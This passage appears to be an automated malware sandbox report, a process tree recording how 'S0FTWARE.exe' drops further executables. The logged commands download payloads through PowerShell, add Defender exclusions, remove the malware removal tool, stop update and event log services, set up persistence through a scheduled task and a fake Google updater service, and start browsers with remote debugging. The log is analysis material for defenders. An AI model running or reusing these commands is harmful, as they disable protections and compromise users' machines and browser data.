                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4296,i,16985575762878932477,12653668946348461472,262144 --variations-seed-version --mojo-platform-channel-handle=4496 /prefetch:1
                                                                                            5⤵
                                                                                            • Uses browser remote debugging
                                                                                            PID:2544
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4744,i,16985575762878932477,12653668946348461472,262144 --variations-seed-version --mojo-platform-channel-handle=5036 /prefetch:8
                                                                                            5⤵
                                                                                              PID:772
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5500,i,16985575762878932477,12653668946348461472,262144 --variations-seed-version --mojo-platform-channel-handle=5520 /prefetch:8
                                                                                              5⤵
                                                                                                PID:2148
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                              4⤵
                                                                                              • Uses browser remote debugging
                                                                                              PID:5164
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
                                                                                                5⤵
                                                                                                • Uses browser remote debugging
                                                                                                PID:2524
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x184,0x2f4,0x7ff85ec6f208,0x7ff85ec6f214,0x7ff85ec6f220
                                                                                                  6⤵
                                                                                                    PID:2540
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2096,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=2092 /prefetch:2
                                                                                                    6⤵
                                                                                                      PID:5752
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1908,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=2356 /prefetch:3
                                                                                                      6⤵
                                                                                                        PID:4120
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2536,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=2532 /prefetch:8
                                                                                                        6⤵
                                                                                                          PID:3476
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3528,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=3616 /prefetch:1
                                                                                                          6⤵
                                                                                                          • Uses browser remote debugging
                                                                                                          PID:5508
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3520,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:1
                                                                                                          6⤵
                                                                                                          • Uses browser remote debugging
                                                                                                          PID:5384
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4164,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=4208 /prefetch:1
                                                                                                          6⤵
                                                                                                          • Uses browser remote debugging
                                                                                                          PID:1844
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4180,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=4260 /prefetch:2
                                                                                                          6⤵
                                                                                                          • Uses browser remote debugging
                                                                                                          PID:2380
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3840,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=5020 /prefetch:8
                                                                                                          6⤵
                                                                                                            PID:3940
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5320,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=5288 /prefetch:8
                                                                                                            6⤵
                                                                                                              PID:6040
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5596,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=5544 /prefetch:8
                                                                                                              6⤵
                                                                                                                PID:4988
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5600,i,14818275630585486653,18189213349051258569,262144 --variations-seed-version --mojo-platform-channel-handle=5656 /prefetch:8
                                                                                                                6⤵
                                                                                                                  PID:968
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\0zcb1" & exit
                                                                                                              4⤵
                                                                                                                PID:5412
                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                  timeout /t 11
                                                                                                                  5⤵
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:3952
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\kdbmvxbera\btdkb.exe'"
                                                                                                              3⤵
                                                                                                                PID:5280
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\kdbmvxbera\btdkb.exe'"
                                                                                                                  4⤵
                                                                                                                  • Blocklisted process makes network request
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Downloads MZ/PE file
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:5124
                                                                                                              • C:\Users\Admin\AppData\Local\kdbmvxbera\lkmqbmmk.exe
                                                                                                                "C:\Users\Admin\AppData\Local\kdbmvxbera\lkmqbmmk.exe"
                                                                                                                3⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Executes dropped EXE
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:4168
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                  4⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:4636
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                    5⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:2188
                                                                                                              • C:\Users\Admin\AppData\Local\kdbmvxbera\btdkb.exe
                                                                                                                "C:\Users\Admin\AppData\Local\kdbmvxbera\btdkb.exe"
                                                                                                                3⤵
                                                                                                                  PID:3240
                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                    4⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:668
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                    4⤵
                                                                                                                      PID:756
                                                                                                                      • C:\Windows\system32\wusa.exe
                                                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                        5⤵
                                                                                                                          PID:3320
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                        4⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:4088
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                        4⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:692
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                        4⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:4492
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop bits
                                                                                                                        4⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:3204
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop dosvc
                                                                                                                        4⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:3040
                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                        4⤵
                                                                                                                        • Power Settings
                                                                                                                        PID:5608
                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                        4⤵
                                                                                                                        • Power Settings
                                                                                                                        PID:2528
                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                        4⤵
                                                                                                                        • Power Settings
                                                                                                                        PID:2004
                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                        4⤵
                                                                                                                        • Power Settings
                                                                                                                        PID:3732
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
                                                                                                                        4⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:776
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
                                                                                                                        4⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:3144
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe stop eventlog
                                                                                                                        4⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:1696
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
                                                                                                                        4⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:5404
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zO034CAB18\S0FTWARE.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zO034CAB18\S0FTWARE.exe"
                                                                                                                    2⤵
                                                                                                                    • Checks computer location settings
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5072
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\gkjmelg', 'C:\Users', 'C:\ProgramData'"
                                                                                                                      3⤵
                                                                                                                        PID:1744
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\gkjmelg', 'C:\Users', 'C:\ProgramData'"
                                                                                                                          4⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:5924
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\gkjmelg\kfwttlf.exe'"
                                                                                                                        3⤵
                                                                                                                          PID:5000
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\gkjmelg\kfwttlf.exe'"
                                                                                                                            4⤵
                                                                                                                            • Blocklisted process makes network request
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Downloads MZ/PE file
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:5288
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\gkjmelg\yadltyouruy.exe'"
                                                                                                                          3⤵
                                                                                                                            PID:2832
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\gkjmelg\yadltyouruy.exe'"
                                                                                                                              4⤵
                                                                                                                              • Blocklisted process makes network request
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              • Downloads MZ/PE file
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:2636
                                                                                                                          • C:\Users\Admin\AppData\Local\gkjmelg\kfwttlf.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\gkjmelg\kfwttlf.exe"
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:5512
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                              4⤵
                                                                                                                              • Uses browser remote debugging
                                                                                                                              PID:3512
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff86d14dcf8,0x7ff86d14dd04,0x7ff86d14dd10
                                                                                                                                5⤵
                                                                                                                                  PID:1524
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\gkjmelg\xgeyridavkk.exe'"
                                                                                                                              3⤵
                                                                                                                                PID:3468
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\gkjmelg\xgeyridavkk.exe'"
                                                                                                                                  4⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  PID:5516
                                                                                                                              • C:\Users\Admin\AppData\Local\gkjmelg\yadltyouruy.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\gkjmelg\yadltyouruy.exe"
                                                                                                                                3⤵
                                                                                                                                  PID:5948
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                    4⤵
                                                                                                                                      PID:1512
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                        5⤵
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:6052
                                                                                                                                  • C:\Users\Admin\AppData\Local\gkjmelg\xgeyridavkk.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\gkjmelg\xgeyridavkk.exe"
                                                                                                                                    3⤵
                                                                                                                                      PID:4572
                                                                                                                                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                        4⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        PID:1192
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                        4⤵
                                                                                                                                          PID:5156
                                                                                                                                          • C:\Windows\system32\wusa.exe
                                                                                                                                            wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                            5⤵
                                                                                                                                              PID:3256
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                            4⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:3144
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                            4⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:1668
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                            4⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:5832
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe stop bits
                                                                                                                                            4⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:5328
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                            4⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:3532
                                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                            4⤵
                                                                                                                                            • Power Settings
                                                                                                                                            PID:6052
                                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                            4⤵
                                                                                                                                            • Power Settings
                                                                                                                                            PID:640
                                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                            4⤵
                                                                                                                                            • Power Settings
                                                                                                                                            PID:6016
                                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                            4⤵
                                                                                                                                            • Power Settings
                                                                                                                                            PID:864
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                            4⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:3688
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
                                                                                                                                            4⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:5316
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                      1⤵
                                                                                                                                        PID:3388
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                        1⤵
                                                                                                                                          PID:5288
                                                                                                                                        • C:\ProgramData\GoogleUP\Chrome\Updater.exe
                                                                                                                                          C:\ProgramData\GoogleUP\Chrome\Updater.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:3008
                                                                                                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                              2⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:1080
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                              2⤵
                                                                                                                                                PID:6056
                                                                                                                                                • C:\Windows\system32\wusa.exe
                                                                                                                                                  wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4164
                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                  C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                  2⤵
                                                                                                                                                  • Launches sc.exe
                                                                                                                                                  PID:6052
                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                  2⤵
                                                                                                                                                  • Launches sc.exe
                                                                                                                                                  PID:1316
                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                  C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                  2⤵
                                                                                                                                                  • Launches sc.exe
                                                                                                                                                  PID:4456
                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                  C:\Windows\system32\sc.exe stop bits
                                                                                                                                                  2⤵
                                                                                                                                                  • Launches sc.exe
                                                                                                                                                  PID:1972
                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                  C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                  2⤵
                                                                                                                                                  • Launches sc.exe
                                                                                                                                                  PID:3692
                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                  2⤵
                                                                                                                                                  • Power Settings
                                                                                                                                                  PID:3104
                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                  2⤵
                                                                                                                                                  • Power Settings
                                                                                                                                                  PID:2624
                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                  2⤵
                                                                                                                                                  • Power Settings
                                                                                                                                                  PID:4836
                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                  2⤵
                                                                                                                                                  • Power Settings
                                                                                                                                                  PID:5068
                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                  C:\Windows\system32\conhost.exe
                                                                                                                                                  2⤵
                                                                                                                                                    PID:3456
                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                    explorer.exe
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4592
                                                                                                                                                  • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                    "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap7205:88:7zEvent22129
                                                                                                                                                    1⤵
                                                                                                                                                      PID:4212
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\service.exe
                                                                                                                                                      C:\Users\Admin\AppData\Roaming\service.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2100
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                          2⤵
                                                                                                                                                            PID:2264
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                                                                                                                                                              3⤵
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:4880
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                          1⤵
                                                                                                                                                            PID:6124
                                                                                                                                                          • C:\Users\Admin\Desktop\S0FTWARE.exe
                                                                                                                                                            "C:\Users\Admin\Desktop\S0FTWARE.exe"
